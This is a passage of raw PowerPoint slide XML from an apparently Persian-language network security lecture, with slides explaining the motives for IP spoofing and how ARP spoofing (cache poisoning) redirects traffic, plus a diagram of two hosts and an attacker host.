              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000"/>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914400" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:no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fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دلايل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>IP Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315"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fa-IR" sz="3200" smtClean="0"/>
              <a:t>نفوذگربا آدرس اشتباه امکان تعقيب و کشف ماشينش را از طرف مقابل مي گيرد چرا که بسته هايي که از طرف ماشين او ارسال مي شود آدرس مبدأي دارند که متعلق به يک ماشين بيگناه يا موهوم در شبکه است .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>از طريق آدرس دهي دروغين نفوذگر گاهي موفق به عبور بسته هاي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> خود از ميان فيلتر يا ديواره آتش يک سيستم که به آدرس </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> حساسيت دارند خواهد شد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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219200" y="1"/>
            <a:ext cx="4235450" cy="914400"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ARP Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1371600"/>
            <a:ext cx="8229600" cy="4678363"/>
          </a:xfr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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" smtClean="0"/>
              <a:t>به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Arp Spoofing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Arp cache poisoning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> هم گفته مي شود و روشي براي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Spoof </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> محتويات جدول </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Arp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> يک کامپيوتر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> روي شبکه است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>در اين حمله نفوذگر يک پيغام </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Arp Response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> جعلي با آدرس </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> مورد نظر و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> خود براي ميزبان هاي هدف ارسال مي کند و اين باعث ميشود کامپيوتر هاي هدف اطلاعات خود را به جاي فرستادن به مقصد مورد نظر براي نفوذگر ارسال کنند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fa-IR" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="6356350"/>
            <a:ext cx="2133600" cy="365125"/>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defRPr/>
            </a:pPr>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="fa-IR" sz="1300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">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Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6245225"/>
            <a:ext cx="2133600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104451" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6245225"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F934E8EC-C242-44A2-A20B-1AC79DA1EB39}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223234" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="347663"/>
            <a:ext cx="7880350" cy="650875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>ARP Poisoning &amp;Broadcast request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1447800"/>
            <a:ext cx="5562600" cy="1965325"/>
            <a:chOff x="1392" y="912"/>
            <a:chExt cx="3504" cy="1238"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="104475" name="Picture 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="912"/>
              <a:ext cx="768" cy="870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="104476" name="Picture 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="912"/>
              <a:ext cx="768" cy="870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104477" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2064" y="1584"/>
              <a:ext cx="2160" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104478" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1487" y="1824"/>
              <a:ext cx="536" cy="326"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>10.10.0.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104479" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4315" y="1824"/>
              <a:ext cx="536" cy="326"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Host B</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>10.10.0.2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104455" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="4800600"/>
            <a:ext cx="1162050" cy="1362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104456" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2382838" y="6248400"/>
            <a:ext cx="1360487" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Host C (Hacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>10.10.0.11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2514600"/>
            <a:ext cx="1676400" cy="3276600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="1056" cy="2064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104473" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="1584"/>
              <a:ext cx="0" cy="2064"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104474" name="Line 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2112" y="3648"/>
              <a:ext cx="1056" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104458" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4953000"/>
            <a:ext cx="184150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104459" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6232525" y="4989513"/>
            <a:ext cx="184150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3417888"/>
            <a:ext cx="2590800" cy="468312"/>
            <a:chOff x="1392" y="2454"/>
            <a:chExt cx="1632" cy="295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="223249" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1968" y="2454"/>
              <a:ext cx="1056" cy="295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="65A779"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="009900"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>00-E0-2B-13-68-00</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="223250" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2454"/>
              <a:ext cx="576" cy="295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="65A779"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
